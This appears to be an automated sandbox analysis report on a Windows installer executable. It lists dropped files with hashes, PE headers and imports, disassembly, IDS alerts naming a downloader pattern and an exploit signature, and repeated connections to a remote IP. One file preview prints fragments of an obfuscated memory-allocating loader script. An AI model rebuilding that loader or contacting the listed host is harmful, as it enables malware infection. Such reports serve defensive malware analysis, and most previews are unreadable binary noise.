                                      SHA1:4611FA8AADACBDFEA00845D0F8BAF9315B9E04F0
                                      SHA-256:41F1D6C7B94F3636B10E2911CCFD0B29E85FE4A8B0B24BAB3C1ED1F9B11F7B62
                                      SHA-512:FC015E8CD4902D75061E5EAC1364B3F78A6D6AC2563EC9B7EB2EB1E054F528DE18AA6539AF529D1744AB497290C4171D94D3C44FC2341BB76E06D8F78DE1F833
                                      Malicious:false
                                      Reputation:low
                                      Preview:... ..............UUUU............???.......jj.yy.=.44.........SS.......y..............".............}........444.........[[.s.............y...tttt.....................Z.~............^^^..........................F..v......D.....................a......t....%....==.......l.....77.C..cc..........ddd......hhhhhhh.................................../........I........ ...........................F.m......z.............u.``...........\\........ ..............C..................%%%.IIIII.xxx..ZZZZZ........\.......,,...*...{{........SS.........}....^..F...<.0.s...\.........ccc...{{....?.....t..QQ........=.Z..........r......PPPP..............&&.............{{{{..%%...............;;;;;.::.......)...QQ............"................QQ........!....B..............F....................PP.........................y.............."""....................a........yyy.KK............((....A....................KKK..............r.........z.......................>>>>....-...P..........AA......zzzz............
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:GTA audio index data (SDT)
                                      Category:dropped
                                      Size (bytes):12235
                                      Entropy (8bit):4.572701327859005
                                      Encrypted:false
                                      SSDEEP:192:dgdGeuhAlLzD/84n7aYQf5eSRWyv73fyqbM1uYrgceaQM/:dgdGeuhA9/iY45eSRWo73fyqb8uYr00
                                      MD5:BF5C38D150E1B8D25560034E5623D83C
                                      SHA1:F538E35AED4F6893F3F5F5BD1230B0A2F9EE5A97
                                      SHA-256:6DD426B7167D273258442F339AC082FE1BFB479B48C1DD3716E17294B346C929
                                      SHA-512:CD96D8C3B4958FCF3DB75DE73B757C8B3227664F6251727BFA8E71AB0F6D69722752A38DF5450A6358BC19BAE6D04D200112387DC36A85BEF150756DD184D76F
                                      Malicious:false
                                      Preview:.....U......y.......R................8888.............. ............."""".CCCCC....:.&&&......k.B.e...r...n..ie...l...3..O2...:...:...C...r.Z.e...a...t...e...F...i...l...e..(A...(...m... ...r...4... ...,... ...i... ...0.,.x...8...0.NN0...0.>.0...0...0.*.0...,... ...i... ...0...,.CC .I.p... ...0.LL,.77 ...i... ...4.jj,... ...i... ...0...x...8...0...,... ...i... .=.0..U).|.i..[....r...8...q...k..pe...r...n...e...l...3...2...:...:...S..De...t.0.F...i...l...e...P...o...i...n...t...e...r...(...i... ...r...8...,... ...i... ...2.."3...0...1...2... ...,... ...i... .GG0...,...i... ...0...)...i......3r...4...q...k...e...r.F.n...e...l...3...2.2.:...:.**V...i...r...t...u...a...l...A...l...l...o...c...(..ei... ...0..b,...i... ...6...0...6...2...0...8..i0...0...,... ..ki... ...0...x.,.3...0...0...0...,.mm ...i... .EE0...x.kk4...0..P)...p.......r...2.Q.q...k...e.5.r...n...e...l...3...2...:...:...R...e...a...d...F...i..ul...e...(...i... ..]r...8...,... .>>i... ...r..B2.<<,... ...i... ..d6...0...6...2
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):422983
                                      Entropy (8bit):1.2471032907625013
                                      Encrypted:false
                                      SSDEEP:1536:5NoutEi8nTdgryYti40QzlN7nJRim3FPbjEkK:5vOi8nTij0Qrz3Fkk
                                      MD5:5D882E43F04F9E3ECAB75D91513C47C5
                                      SHA1:C53CDFD7B5C28D4B96BBB113B1930859ADA7503C
                                      SHA-256:D5388F93E2E8652096A94D0DA440FC30631A454EEFE2B94681339F58B1D215BF
                                      SHA-512:30D73608445A0F35183BF3E235978773DF6F60D057902E97B4A85CBF20201C9ED31DF3205C22E8BCEB72B8D2CD8F86A05AC5C7F13B7B4886467FE43816879452
                                      Malicious:false
                                      Preview:.{..........................R.........[..............................................................................".......................I......................6..................../...................1...................l......................................}.....................................................................o...................................&............2...................}......%..a......................&........................).....................(................l..........................................a..~g'...............#........6...........................................................................................................................o...........{......M........................>.............s.......q......"................................U........................................g..................7.............#.........................<......................................................c...-..Y................................m.
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):271566
                                      Entropy (8bit):1.260545183044887
                                      Encrypted:false
                                      SSDEEP:768:mM2KAo+yjNnNRgJLYCK6FVY60l2W9nu01LDmyNqBEVRhfB8yvEx+PtIr5UXBCtmj:mW+9W11HYURi8LdOge63
                                      MD5:863FA122F521E238CB0FC11152C29A97
                                      SHA1:2A21A721B5B84C173CA00D7E7BFB8B48645DE5B6
                                      SHA-256:A4168D8B8246F976D65448E07F0DC9F99A6A16D8D2586B00555387AD02099DAE
                                      SHA-512:FCB763392AF39B463B664D842DD86DA8DF75D4FCC7AB9CE846357695E26E8BFE12B5F2E038462737D8B3BA848F62996B9342BCE79E231766C21CC3CCE9D91031
                                      Malicious:false
                                      Preview:............4..........................................................l...............Z........!.....n............................;............................f..................................:...!................................................................................................................................................a......................4.....|..............Y................]..................@............................#.c.....................................Q......._...............................................H..........y.........................7................................6.............................J............................!............$...................................................O..............~................................................................C.................H.......................................|..................t..........Y.......>.........0......d...;.>.........................,..........%....................
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):529
                                      Entropy (8bit):4.22369333189341
                                      Encrypted:false
                                      SSDEEP:12:UzadHNcuAGwIvUKMp9iRpCpadVf3ZWqKU7jFz9W8:UoHNcuq1U0pU3a8
                                      MD5:B6F5DF9A099D85E8EF9CB11317AB4467
                                      SHA1:3AA33AFE232E6F00608AE69A84E0C308B62E2EA2
                                      SHA-256:05DE4CFDF5C4F833D2D5A2931B9719F22912D50485BDF8AF3206B53037A43999
                                      SHA-512:3164AB5E6D8CE8E97C03424776D1236535D6B7717AB2C6CC25D718AE62FE3BB57A9B998AA3412ADA044812BA45A809E9873A069ED61F6689AFAFC34894ECFB34
                                      Malicious:false
                                      Preview:udsyr idiotismens befolkningsgrundlaget aarsfesternes brachyceral stannoxyl,reabsorbed kokkenes lediggngere appellatory underldige latiner.kegling perfidt kommandosttets crossgrainedness indviklingen stabilitate modn selvrespektens recompenses terkils..fattigdomsdebatten oxidising astilbe preeconomically betastraalernes.socialpensioner sagsbehandlernes chromophilous nondenial belle stemmesamleren,kampestens nonbotanic accession romdisk udslukkende twinemaking becalm udlggerne centrifugalization hottentotese lkasses secern..
                                      Process:C:\Users\user\Desktop\5WP9WCM8qV.exe
                                      File Type:DIY-Thermocam raw data (Lepton 3.x), scale 129-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 36028797018963968.000000
                                      Category:dropped
                                      Size (bytes):258325
                                      Entropy (8bit):1.2557915582426904
                                      Encrypted:false
                                      SSDEEP:768:qE8odS4zheB8ZZDhlEIxdZCtzYpGByaaQasESD+VqOe9VniXR4zSlMfWblqRfE6n:5t2D72hR5qRfE+W/IIjWgu
                                      MD5:27D252AAC87023B3333B038C8366D683
                                      SHA1:2F443415B95254A1DB926304565FC76A59CF848C
                                      SHA-256:3719E64CA180AFC5C303E7DAFE26A80359FE8BC3E0C472A822EC7D0847D70252
                                      SHA-512:C523F2A23C27A782A830486352EA0BDE565AD802B22FFE67B05E91B1EA7B4ECD1DADFE19635C403D86932EC1102240209AB9C6EBDE02F065948D1AC09D9B0C73
                                      Malicious:false
                                      Preview:.............................................................2.....x..................)................................................5..g.............f....)........$...............................]............p.............................F........................................&............................%.........................?....................3............H...........................................................=........................................T...........................!......................................................L.......................................................p.............L....................................................................../................,............}.....P0.....].....................v....Y...............................m*............................%..[...................d.................6................1.........................................c....... ...........'.<...............................<............J....
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.914141801533325
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:5WP9WCM8qV.exe
                                      File size:538'129 bytes
                                      MD5:649ba11fd51e50393b1cf0f461b90cbf
                                      SHA1:99dc18ad322a073c6e17e5c129832f85f2092b6c
                                      SHA256:950a25a2f21613cae69f796f6a3eeab57f92b711afb746dfeafefa00d5bfad55
                                      SHA512:b7e0034c8813484192d3a77c0e5ef8a80ca1200aeed85444327c8433e25807c5bd16afc38400b9ff7138480af457fd4bb7c967d24839930e9c392ff2e94be305
                                      SSDEEP:12288:/5K4KY7IAEmMsA/LUMyv+8T59Dgco9yHtdIaLDjnm:84T0GMs1m8T59D0QIaLDjn
                                      TLSH:CDB42341F545C126E8623F3818B7DE658F98EE245932DB0B67063B29ABB30C1EF57352
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L......V.................d.........
                                      Icon Hash:65e4b2bfb5bfb3ff
                                      Entrypoint:0x4032a0
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x567F847F [Sun Dec 27 06:26:07 2015 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:d4b94e8ee3f620a89d114b9da4b31873
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebp
                                      push esi
                                      push 00000020h
                                      xor ebp, ebp
                                      pop esi
                                      mov dword ptr [esp+0Ch], ebp
                                      push 00008001h
                                      mov dword ptr [esp+0Ch], 0040A300h
                                      mov dword ptr [esp+18h], ebp
                                      call dword ptr [004080B0h]
                                      call dword ptr [004080ACh]
                                      cmp ax, 00000006h
                                      je 00007F7A713EF823h
                                      push ebp
                                      call 00007F7A713F2966h
                                      cmp eax, ebp
                                      je 00007F7A713EF819h
                                      push 00000C00h
                                      call eax
                                      push ebx
                                      push edi
                                      push 0040A2F4h
                                      call 00007F7A713F28E3h
                                      push 0040A2ECh
                                      call 00007F7A713F28D9h
                                      push 0040A2E0h
                                      call 00007F7A713F28CFh
                                      push 00000009h
                                      call 00007F7A713F2934h
                                      push 00000007h
                                      call 00007F7A713F292Dh
                                      mov dword ptr [00434F04h], eax
                                      call dword ptr [00408044h]
                                      push ebp
                                      call dword ptr [004082A8h]
                                      mov dword ptr [00434FB8h], eax
                                      push ebp
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebp
                                      push 0042B228h
                                      call dword ptr [0040818Ch]
                                      push 0040A2C8h
                                      push 00433F00h
                                      call 00007F7A713F251Ah
                                      call dword ptr [004080A8h]
                                      mov ebx, 0043F000h
                                      push eax
                                      push ebx
                                      call 00007F7A713F2508h
                                      push ebp
                                      call dword ptr [00408178h]
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85c80xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5c0000x7590.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x350000x270000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x5c0000x75900x7600a6c18742ec2824937e7f2b24615a720bFalse0.3500066207627119data5.1863956934511295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x5c3100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.329149377593361
                                      RT_ICON0x5e8b80x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.35659760087241005
                                      RT_ICON0x605600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.37640712945590993
                                      RT_ICON0x616080xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3200EnglishUnited States0.4305555555555556
                                      RT_ICON0x622b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4379432624113475
                                      RT_ICON0x627180x368Device independent bitmap graphic, 16 x 32 x 24, image size 832EnglishUnited States0.4873853211009174
                                      RT_ICON0x62a800x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.24865591397849462
                                      RT_ICON0x62d680x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.38175675675675674
                                      RT_DIALOG0x62e900x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x62f900x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x630b00xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x631780x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x631d80x76dataEnglishUnited States0.6610169491525424
                                      RT_MANIFEST0x632500x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                      DLLImport
                                      KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                      USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                      ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-11-05T16:13:44.632588+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849706TCP
                                      2024-11-05T16:13:48.306164+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84970845.33.20.23580TCP
                                      2024-11-05T16:13:58.967249+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84970945.33.20.23580TCP
                                      2024-11-05T16:14:09.808561+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971045.33.20.23580TCP
                                      2024-11-05T16:14:20.444838+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971145.33.20.23580TCP
                                      2024-11-05T16:14:23.191975+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.849712TCP
                                      2024-11-05T16:14:31.080249+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971345.33.20.23580TCP
                                      2024-11-05T16:14:41.699854+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971445.33.20.23580TCP
                                      2024-11-05T16:14:52.317635+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971545.33.20.23580TCP
                                      2024-11-05T16:15:02.954283+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971645.33.20.23580TCP
                                      2024-11-05T16:15:13.564833+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971745.33.20.23580TCP
                                      2024-11-05T16:15:24.173235+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971845.33.20.23580TCP
                                      2024-11-05T16:15:34.802466+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84971945.33.20.23580TCP
                                      2024-11-05T16:15:45.435578+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84972045.33.20.23580TCP
                                      2024-11-05T16:15:56.075437+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84972145.33.20.23580TCP
                                      2024-11-05T16:16:06.684759+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84972245.33.20.23580TCP
                                      2024-11-05T16:16:17.305113+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84972345.33.20.23580TCP
                                      2024-11-05T16:16:27.980874+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.84972445.33.20.23580TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 5, 2024 16:13:46.981220961 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:46.986236095 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:46.986319065 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:46.988059998 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:46.993350029 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306051016 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306066990 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306086063 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306164026 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:48.306204081 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:48.306320906 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:48.306562901 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306612015 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:48.306689024 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:48.306727886 CET4970880192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:48.311837912 CET804970845.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.320235968 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.325133085 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.325371027 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.325544119 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.330424070 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.967118979 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.967200041 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.967248917 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.967286110 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.967345953 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:13:58.967386961 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.967421055 CET4970980192.168.2.845.33.20.235
                                      Nov 5, 2024 16:13:58.972781897 CET804970945.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:08.976362944 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:08.983505011 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:08.983611107 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:08.983772039 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:08.989321947 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:09.808445930 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:09.808546066 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:09.808557034 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:09.808561087 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:09.808594942 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:09.808614016 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:09.808631897 CET4971080192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:09.813682079 CET804971045.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:19.820267916 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:19.830694914 CET804971145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:19.830821991 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:19.830996990 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:19.841901064 CET804971145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:20.444678068 CET804971145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:20.444838047 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:20.444931030 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:20.445852041 CET804971145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:20.445941925 CET4971180192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:20.449781895 CET804971145.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:30.461393118 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:30.466489077 CET804971345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:30.466592073 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:30.466727972 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:30.472239017 CET804971345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:31.080193996 CET804971345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:31.080249071 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:31.080787897 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:31.081741095 CET804971345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:31.081787109 CET4971380192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:31.085983992 CET804971345.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:41.087842941 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.092839003 CET804971445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:41.092941999 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.093044043 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.097853899 CET804971445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:41.699768066 CET804971445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:41.699853897 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.700011969 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.702310085 CET804971445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:41.702621937 CET4971480192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:41.705229044 CET804971445.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:51.711560011 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:51.716744900 CET804971545.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:51.716864109 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:51.717046022 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:51.722779989 CET804971545.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:52.317378998 CET804971545.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:52.317635059 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:52.318628073 CET804971545.33.20.235192.168.2.8
                                      Nov 5, 2024 16:14:52.318705082 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:52.331423998 CET4971580192.168.2.845.33.20.235
                                      Nov 5, 2024 16:14:52.336246967 CET804971545.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:02.337157011 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.342140913 CET804971645.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:02.342226028 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.342324972 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.348427057 CET804971645.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:02.954221010 CET804971645.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:02.954282999 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.955530882 CET804971645.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:02.955579042 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.956792116 CET4971680192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:02.961664915 CET804971645.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:12.961498976 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:12.967065096 CET804971745.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:12.967200994 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:12.967488050 CET4971780192.168.2.845.33.20.235
                                      Nov 5, 2024 16:15:12.972574949 CET804971745.33.20.235192.168.2.8
                                      Nov 5, 2024 16:15:13.564771891 CET804971745.33.20.235192.168.2.8
